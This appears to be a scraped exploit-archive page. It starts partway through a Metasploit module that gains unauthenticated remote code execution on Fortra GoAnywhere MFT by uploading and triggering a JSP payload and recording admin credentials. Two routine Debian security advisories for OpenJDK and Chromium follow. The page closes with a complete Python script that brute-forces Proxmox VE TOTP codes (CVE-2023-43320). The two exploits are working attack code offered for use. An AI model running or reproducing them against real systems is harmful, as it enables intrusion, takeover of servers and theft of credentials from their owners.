}    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply 4 from FileManager.xhtml')    end    # We require a regID value form the page to upload a file, so we pull that out here.    vs_input = res.get_html_document.at('input[name="reqId"]')    unless vs_input&.key? 'value'      fail_with(Failure::UnexpectedReply, 'Did not locate reqId in reply 4 from FileManager.xhtml')    end    request_id = vs_input['value']    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/tools/filemanager/FileManager.xhtml'),      'keep_cookies' => true,      'vars_post' => {        'javax.faces.ViewState' => viewstate,        'javax.faces.partial.ajax' => 'true',        'javax.faces.source' => 'uploadID',        'javax.faces.partial.execute' => 'uploadID',        'javax.faces.partial.render' => '@none',        'uploadID' => 'uploadID',        'uploadID_sessionCheck' => 'true',        'reqId' => request_id,        'whenFileExists_focus' => '',        'whenFileExists_input' => 'rename',        'uploaderType' => 'filemanager',        'j_id_4i_SUBMIT' =>  1      }    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply 5 from FileManager.xhtml')    end    jsp_filename = Rex::Text.rand_text_alphanumeric(8) + '.jsp'    message = Rex::MIME::Message.new    message.add_part(request_id, nil, nil, 'form-data; name="reqId"')    message.add_part('', nil, nil, 'form-data; name="whenFileExists_focus"')    message.add_part('rename', nil, nil, 'form-data; name="whenFileExists_input"')    message.add_part('filemanager', nil, nil, 'form-data; name="uploaderType"')    message.add_part('1', nil, nil, 'form-data; name="j_id_4i_SUBMIT"')    message.add_part(viewstate, nil, nil, 'form-data; name="javax.faces.ViewState"')    message.add_part('true', nil, nil, 'form-data; name="javax.faces.partial.ajax"')    message.add_part('uploadID', nil, nil, 'form-data; name="javax.faces.partial.execute"')    message.add_part('uploadID', nil, nil, 'form-data; name="javax.faces.source"')    message.add_part('1', nil, nil, 'form-data; name="uniqueFileUploadId"')    message.add_part(payload.encoded, 'text/plain', nil, "form-data; name=\"uploadID\"; filename=\"#{jsp_filename}\"")    # We can now upload our payload...    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/tools/filemanager/FileManager.xhtml'),      'keep_cookies' => true,      'ctype' => 'multipart/form-data; boundary=' + message.bound,      'data' => message.to_s    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply 6 from FileManager.xhtml')    end    # Register our payload so it is deleted when the session is created.    jsp_filepath = adminroot_path + jsp_filename    print_status("Dropped payload: #{jsp_filepath}")    # We are using the FileDropper mixin to automatically delete this file after a session has been created.    register_file_for_cleanup(jsp_filepath)    # A copy of the files this user uploads is left here:    # /opt/HelpSystems/GoAnywhere/userdata/documents/ADMIN_USERNAME/PAYLOAD_NAME.jsp    # We register these to be deleted, but they appear to be locked, preventing deleting.    userdoc_path = detected_target['GOANYWHERE_INSTALL_PATH']    userdoc_path += path_separator unless userdoc_path.end_with? path_separator    userdoc_path += 'userdata'    userdoc_path += path_separator    userdoc_path += 'documents'    userdoc_path += path_separator    userdoc_path += admin_username    userdoc_path += path_separator    register_file_for_cleanup(userdoc_path + jsp_filename)    register_dir_for_cleanup(userdoc_path)    # Finally, trigger our payload via a GET request...    send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, jsp_filename)    )    # NOTE: it is not possible to delete the user account we created as we cant delete ourself either via the web    # interface or REST API.  end  # Helper method to pull out a viewstate identifier from a requests HTML response.  def get_viewstate(endpoint)    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, endpoint),      'keep_cookies' => true    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, "Unexpected reply during get_viewstate via '#{endpoint}'.")    end    vs_input = res.get_html_document.at('input[name="javax.faces.ViewState"]')    unless vs_input&.key? 'value'      fail_with(Failure::UnexpectedReply, "Did not locate ViewState during get_viewstate via '#{endpoint}'.")    end    vs_input['value']  end  def store_credentials(username, password)    service_data = {      address: datastore['RHOST'],      port: datastore['RPORT'],      service_name: 'GoAnywhere MFT Admin Interface',      protocol: 'tcp',      workspace_id: myworkspace_id    }    credential_data = {      origin_type: :service,      module_fullname: fullname,      username: username,      private_data: password,      private_type: :password    }.merge(service_data)    credential_core = create_credential(credential_data)    login_data = {      core: credential_core,      last_attempted_at: DateTime.now,      status: Metasploit::Model::Login::Status::SUCCESSFUL    }.merge(service_data)    create_credential_login(login_data)  endend

Fortra GoAnywhere MFT Unauthenticated Remote Code Execution

Debian Linux Security Advisory 5613-1 - Several vulnerabilities have been discovered in the OpenJDK Java runtime, which may result in side channel attacks, leaking sensitive data to log files, denial of service or bypass of sandbox restrictions.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5613-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 01, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : openjdk-17CVE ID         : CVE-2024-20918 CVE-2024-20919 CVE-2024-20921 CVE-2024-20926                  CVE-2024-20932 CVE-2024-20945 CVE-2024-20952Several vulnerabilities have been discovered in the OpenJDK Java runtime,which may result in side channel attacks, leaking sensitive data to logfiles, denial of service or bypass of sandbox restrictions.For the oldstable distribution (bullseye), these problems have been fixedin version 17.0.10+7-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 17.0.10+7-1~deb12u1.We recommend that you upgrade your openjdk-17 packages.For the detailed security status of openjdk-17 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/openjdk-17Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmW8HJwACgkQEMKTtsN8Tjbt9A//Xgt7dwtzkBgkxjJ9Tq6pqQGqYzQQjID6xmyta+/oZ9FJzPojV+1I7z7YeOOYrXHmCU9EM30Gbwtt4aEBbz1lvAk1mYC5Ob5TE+oYS/r76REJS89IqkNpmlpWFMzQICgPDHPE1Vm3HyitF6Xy9CLOFZBeH0wELhzuHAIOd4rb+XqQsW8JW4V12ZoLAVHoP5U2PGBPWVbyEY06LTgyEe06L+XX1zSiPnRnhdeTs7YD69SxMUP9AF7QvfIzOvzLw0u0M4g7KNzZ+43OJOdlbq76KzfcqfkoxWA3902vYewfyncx5HVCNpCQdrESIt9Xjqojmda7dh0V9EIGP3HHFufjWnJTOegPqeJ2RV03LkpOygg1W+XEHn32fcA1EtqDYUW67jsu81dYZs2wc2YqALJfjYjeUKBdcRD91MUqn7uBpCfPd9Yo1rrO2dqyeBgQeI7itzdM+bEtCkuVcnyCWr4rXK4kt2xpIdkcwUZxCosQ7FX/TchvyPvDk2LQSMg2azCSAhcrv7aB/jzxlvSF/iRzQipdLmRgc4H+8TY0lG43m7xzHlyu3TXerDNIBQGktkWo6182rScrO+t0brfcCpTxUQwGyBrHh7SQURdvffZPCJ36/7YmjGSWZi4qafr6OfTCGDlt/BcE5fhROsA7OKNgwumUz9hqSK3mCFBDmhDQDTw==Suvn-----END PGP SIGNATURE-----

Debian Security Advisory 5613-1

Debian Linux Security Advisory 5612-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5612-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonFebruary 01, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-1059 CVE-2024-1060 CVE-2024-1077Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 121.0.6167.139-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmW742EACgkQZF0CR8NudjdCCA//R3r8wJi68kZQZOOUeekz1PrrGI/uFuD3Ial5GxJytfKDyuXI8d55GyXbqCZzMQYeL0l9JO5wEscb2wixvnaD+4zG1cb6hwMFo7Rae1KMMgo9JHKgOFVIPnI9upvtDI8GdQoJyhoVIRab4FkD09lNUYIz2UCUJEwORa7+JVaCoSYiG3Mkj2p2SDwxpn2BiN5rI/G/GrfF/nJuJ+ebiZsh3jQyfsreomKo6Bq3ajsYKs5G4osOxK164Mjp8gKYx82dzxiK2e/58gvEUdY3h3oG8twQMJ5VrYgIT19Ih4XNpn50x4Bn+OlzTR7vPG6RuOgTY/XjHr4Pfc+NYd7hEfyH37KODFUCC5482jCY9aLSHmP/poGmo8SfSBO+H7NmZC8g8co2hOf30Bczfndb4TMpz8PRz/zojzBWmL2mIYU/O0aavcS+xO8gy753xuoESFbjj9Z0j5YRphyCyh/aB3gKxiY+LMh97EEjQWvI8XJucYJ+6IFdNWJOHTNoZEOe7tXnwKQ4EP4BtG7DDfaH7+VaKJ64ZkAqeXK8niIMPGfb7km4o7wVk58XI88+Yj9xtW+8opyBjahmhCwXs+01S2e+BfOb3k22HXBwNZ9Idq0KTtoRm4Jazf/JH3MTQLS8ri5ZFPeqIdkJer2tN0lSv2KeVASYd1j3oCgG2LJA6eHiNhE==B96X-----END PGP SIGNATURE-----

Debian Security Advisory 5612-1

Proxmox VE versions 5.4 through 7.4-1 suffer from a TOTP brute forcing vulnerability.

    # Exploit Title: Proxmox VE TOTP Brute Force# Date: 09/23/2023# Exploit Author: Cory Cline, Gabe Rust# Vendor Homepage: https://www.proxmox.com/en/# Software Link: http://download.proxmox.com/iso/# Version: 5.4 - 7.4-1# Tested on: Debian# CVE : CVE-2023-43320import timeimport requestsimport urllib.parseimport jsonimport osimport urllib3urllib3.disable_warnings()threads=25#################### REPLACE THESE VALUES #########################password="KNOWN PASSWORD HERE"username="KNOWN USERNAME HERE"target_url="https://HOST:PORT"##################################################################ticket=""ticket_username=""CSRFPreventionToken=""ticket_data={}auto_refresh_time = 20 # in minutes - 30 minutes before expirationlast_refresh_time = 0tokens = [];for num in range(0,1000000):    tokens.append(str(num).zfill(6))def refresh_ticket(target_url, username, password):    global CSRFPreventionToken    global ticket_username    global ticket_data    refresh_ticket_url = target_url + "/api2/extjs/access/ticket"    refresh_ticket_cookies = {}    refresh_ticket_headers = {}    refresh_ticket_data = {"username": username, "password": password, "realm": "pve", "new-format": "1"}    ticket_data_raw = urllib.parse.unquote(requests.post(refresh_ticket_url, headers=refresh_ticket_headers, cookies=refresh_ticket_cookies, data=refresh_ticket_data, verify=False).text)    ticket_data = json.loads(ticket_data_raw)    CSRFPreventionToken = ticket_data["data"]["CSRFPreventionToken"]    ticket_username = ticket_data["data"]["username"]def attack(token):    global last_refresh_time    global auto_refresh_time    global target_url    global username    global password    global ticket_username    global ticket_data    if ( int(time.time()) > (last_refresh_time + (auto_refresh_time * 60)) ):        refresh_ticket(target_url, username, password)        last_refresh_time = int(time.time())    url = target_url + "/api2/extjs/access/ticket"    cookies = {}    headers = {"Csrfpreventiontoken": CSRFPreventionToken}    stage_1_ticket = str(json.dumps(ticket_data["data"]["ticket"]))[1:-1]    stage_2_ticket = stage_1_ticket.replace('\\"totp\\":', '\"totp\"%3A').replace('\\"recovery\\":', '\"recovery\"%3A')    data = {"username": ticket_username, "tfa-challenge": stage_2_ticket, "password": "totp:" + str(token)}    response = requests.post(url, headers=headers, cookies=cookies, data=data, verify=False)    if(len(response.text) > 350):        print(response.text)        os._exit(1)while(1):    refresh_ticket(target_url, username, password)    last_refresh_time = int(time.time())    with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:        res = [executor.submit(attack, token) for token in tokens]        concurrent.futures.wait(res)

Tag

#js